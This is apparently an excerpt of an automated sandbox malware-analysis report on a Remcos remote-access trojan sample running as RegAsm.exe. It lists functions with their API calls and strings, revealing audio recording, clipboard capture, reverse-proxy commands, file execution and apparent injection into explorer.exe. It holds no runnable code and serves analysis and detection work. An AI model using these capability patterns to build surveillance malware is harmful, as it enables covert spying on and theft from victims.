                                                  • Opcode ID: 56d1356c42dc7fa533c5c42bb4693ab64f4e1a1f048b498cab8c93b269848ee8
                                                  • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                  • Opcode Fuzzy Hash: 56d1356c42dc7fa533c5c42bb4693ab64f4e1a1f048b498cab8c93b269848ee8
                                                  • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                  Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                                  • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                  • Opcode Fuzzy Hash: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                                  • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                  Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                  • GetLastError.KERNEL32 ref: 00455D6F
                                                  • __dosmaperr.LIBCMT ref: 00455D76
                                                  • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                  • GetLastError.KERNEL32 ref: 00455D8C
                                                  • __dosmaperr.LIBCMT ref: 00455D95
                                                  • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                  • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                  • GetLastError.KERNEL32 ref: 00455F31
                                                  • __dosmaperr.LIBCMT ref: 00455F38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                  • String ID: H
                                                  • API String ID: 4237864984-2852464175
                                                  • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                  • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                  • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                  • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                  Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: \&G$\&G$`&G
                                                  • API String ID: 269201875-253610517
                                                  • Opcode ID: 603d38a142dc548eb4b528e84f11e511c21ef1631bb53945c21f85f640c78996
                                                  • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                  • Opcode Fuzzy Hash: 603d38a142dc548eb4b528e84f11e511c21ef1631bb53945c21f85f640c78996
                                                  • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                  Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 65535$udp
                                                  • API String ID: 0-1267037602
                                                  • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                  • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                  • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                  • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                  Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                  • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                  • __dosmaperr.LIBCMT ref: 0043A926
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                  • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                  • __dosmaperr.LIBCMT ref: 0043A963
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                  • __dosmaperr.LIBCMT ref: 0043A9B7
                                                  • _free.LIBCMT ref: 0043A9C3
                                                  • _free.LIBCMT ref: 0043A9CA
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                  • String ID:
                                                  • API String ID: 2441525078-0
                                                  • Opcode ID: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                  • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                  • Opcode Fuzzy Hash: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                  • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                  Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                  • TranslateMessage.USER32(?), ref: 0040557E
                                                  • DispatchMessageA.USER32(?), ref: 00405589
                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                  • API String ID: 2956720200-749203953
                                                  • Opcode ID: 9213bbb22c169094994a56f7f9d9aeb5b1f42a168ee8f97de9231567bb2b22dc
                                                  • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                  • Opcode Fuzzy Hash: 9213bbb22c169094994a56f7f9d9aeb5b1f42a168ee8f97de9231567bb2b22dc
                                                  • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                  Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                  • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                  • String ID: 0VG$0VG$<$@$Temp
                                                  • API String ID: 1704390241-2575729100
                                                  • Opcode ID: fdfef061a0c845b66634ed9213ec91d51d63ab98c4c1b6a43026fae5df42adc0
                                                  • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                  • Opcode Fuzzy Hash: fdfef061a0c845b66634ed9213ec91d51d63ab98c4c1b6a43026fae5df42adc0
                                                  • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                  Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 0041697C
                                                  • EmptyClipboard.USER32 ref: 0041698A
                                                  • CloseClipboard.USER32 ref: 00416990
                                                  • OpenClipboard.USER32 ref: 00416997
                                                  • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                  • CloseClipboard.USER32 ref: 004169BF
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                  • String ID: !D@
                                                  • API String ID: 2172192267-604454484
                                                  • Opcode ID: 504df0997904e7872ebe6ecfb3ee4e253f038a0ef8a597049df6207b31d9887a
                                                  • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                  • Opcode Fuzzy Hash: 504df0997904e7872ebe6ecfb3ee4e253f038a0ef8a597049df6207b31d9887a
                                                  • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                  Function 0041330D Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                  • CloseHandle.KERNEL32(?), ref: 004134A0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                  • String ID:
                                                  • API String ID: 297527592-0
                                                  • Opcode ID: 33a11f1d8b65504666c7f3d6a65dc1c7f241de2952f14d7c983c905d35a598f5
                                                  • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                  • Opcode Fuzzy Hash: 33a11f1d8b65504666c7f3d6a65dc1c7f241de2952f14d7c983c905d35a598f5
                                                  • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                  Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                  • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                  • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                  • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                  Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 004481B5
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 004481C1
                                                  • _free.LIBCMT ref: 004481CC
                                                  • _free.LIBCMT ref: 004481D7
                                                  • _free.LIBCMT ref: 004481E2
                                                  • _free.LIBCMT ref: 004481ED
                                                  • _free.LIBCMT ref: 004481F8
                                                  • _free.LIBCMT ref: 00448203
                                                  • _free.LIBCMT ref: 0044820E
                                                  • _free.LIBCMT ref: 0044821C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                  • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                  • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                  • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                  Function 00411530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Eventinet_ntoa
                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                  • API String ID: 3578746661-3604713145
                                                  • Opcode ID: e77db000166ebc480288ee2e00742aa421b72345e853156657c44ddda8400bf2
                                                  • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                  • Opcode Fuzzy Hash: e77db000166ebc480288ee2e00742aa421b72345e853156657c44ddda8400bf2
                                                  • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                  Function 00455F84 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DecodePointer
                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                  • API String ID: 3527080286-3064271455
                                                  • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                  • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                  • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                  • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                  Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  • Sleep.KERNEL32(00000064), ref: 0041755C
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                  • API String ID: 1462127192-2001430897
                                                  • Opcode ID: c5ffc7576fca46f67fe7a2dad330c9118b7d8c55f8f237e319bd0bae48937816
                                                  • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                  • Opcode Fuzzy Hash: c5ffc7576fca46f67fe7a2dad330c9118b7d8c55f8f237e319bd0bae48937816
                                                  • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                  Function 004073E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentProcess
                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                  • API String ID: 2050909247-4242073005
                                                  • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                  • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                  • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                  • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                  Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _strftime.LIBCMT ref: 00401D50
                                                    • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                  • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                  • API String ID: 3809562944-243156785
                                                  • Opcode ID: 631b70e71605f283cfdfcec03d03cf742693868e286b15c17712ccdca5938df0
                                                  • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                  • Opcode Fuzzy Hash: 631b70e71605f283cfdfcec03d03cf742693868e286b15c17712ccdca5938df0
                                                  • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                  Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                  • int.LIBCPMT ref: 00410EBC
                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                  • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                  • String ID: ,kG$0kG
                                                  • API String ID: 3815856325-2015055088
                                                  • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                  • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                  • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                  • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                  Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                  • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                  • waveInStart.WINMM ref: 00401CFE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                  • String ID: dMG$|MG$PG
                                                  • API String ID: 1356121797-532278878
                                                  • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                  • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                  • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                  • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                  Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                    • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                    • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                    • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                  • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                  • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                  • TranslateMessage.USER32(?), ref: 0041D57A
                                                  • DispatchMessageA.USER32(?), ref: 0041D584
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                  • String ID: Remcos
                                                  • API String ID: 1970332568-165870891
                                                  • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                  • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                  • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                  • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                  Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
